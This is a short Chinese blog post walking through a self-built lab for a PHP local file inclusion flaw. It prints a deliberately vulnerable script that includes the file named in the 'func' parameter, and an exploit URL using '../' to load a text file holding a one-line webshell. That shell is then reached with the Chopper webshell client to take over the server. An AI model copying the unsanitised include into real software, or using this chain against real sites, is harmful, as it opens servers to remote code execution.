网上有很多文章 但是我还是自己搭建了一下环境 自己弄了一下 分享一下我的经验
先写一下服务器端代码
<?php
if($_GET['func']){
include $_GET['func'];
}else{
include 'default.php'
}
?>之后我在这个文件的上级新建了一个-7.txt的文件 当然这个文件的内容是php代码 就是一句话
http://192.168.1.101/test_php_local/index.php?func=../-7.txt 浏览这个文件 正常来说应该是txt文件 但是txt文件是按照php文件执行的
看没看到 这里什么都不显示 说明我的木马文件解析了
之后直接上菜刀连接
成功拿下
最后来一张服务器图片
本人qq群:130177625 欢迎大家一起讨论技术
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
